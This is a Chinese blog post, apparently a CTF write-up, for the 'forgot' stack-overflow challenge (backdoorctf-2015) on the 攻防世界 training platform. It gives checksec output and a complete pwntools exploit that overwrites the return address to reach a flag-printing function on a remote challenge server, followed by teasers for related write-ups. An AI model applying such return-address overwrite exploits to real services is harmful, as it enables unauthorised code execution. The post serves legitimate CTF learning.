攻防世界 forgot wp （backdoorctf-2015

作者: 111p1kk | 来源:发表于2019-08-02 23:55 被阅读0次

攻防世界 forgot wp （backdoorctf-2015
攻防世界 Re wp
攻防世界 Crypto wp
攻防世界 Pwn wp
攻防世界 string wp
攻防世界 guess_num wp
攻防世界 level3 wp
攻防世界 int_overflow wp
【攻防世界】高手进阶区 Recho WP
攻防世界 cgpwn2 wp（CGCTF）

checksec

kk@ubuntu:~/Desktop/black/GFSJ/forgot$ checksec forgot 
[*] '/home/kk/Desktop/black/GFSJ/forgot/forgot'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

ida
栈溢出

又找到了这个函数可以直接 cat flag

EXP如下

#!usr/bin/python

from pwn import *

io = remote("111.198.29.45", 54796)
# io = process("./forgot")
flag_addr = 0x080486CC

io.recv()
io.sendline("kk")

io.recv()
payload = "a" * 32 + "a" * 4 + p32(flag_addr)
io.sendline(payload)

io.interactive()

攻防世界 forgot wp （backdoorctf-2015
checksec ida栈溢出 EXP如下
攻防世界 Re wp
hello ctf sprintf（）：int sprintf( char *buffer, const char...
攻防世界 Crypto wp
easy rsa p和q为选取的两个大素数 e为随机选取的小于r =(p-1)(q-1)的数 d为e关于模r的模反...
攻防世界 Pwn wp
0x01get_shell 下载附件后直接丢IDA F5 0x02CGfsb 先用checksec查看开了哪些保护...
攻防世界 string wp
参考：CTF-wiki格式化字符串漏洞利用 0x01寻找漏洞 -checksec -在IDA中对文件进行分析。查...
攻防世界 guess_num wp
0x01寻找漏洞 checksec ida分析箭头所指的地方存在栈溢出，进入sub_C3E函数，发现条件成立即可...
攻防世界 level3 wp
0x01寻找漏洞 checksec ida分析漏洞可以很轻松的找到，read处存在栈溢出 0x02思路分析无l...
攻防世界 int_overflow wp
0x01寻找漏洞 checksec ida分析 0x02利用思路要想利用到strcpy这一步，要么你输入的pas...
【攻防世界】高手进阶区 Recho WP
0x00 考察点考察点有三个： ROP链构造 Got表劫持 pwntools的shutdown功能 0x01 程...
攻防世界 cgpwn2 wp（CGCTF）
0x01寻找漏洞 checksec ida分析进入hello函数发现gets(&s)处存在栈溢出 0x02分析...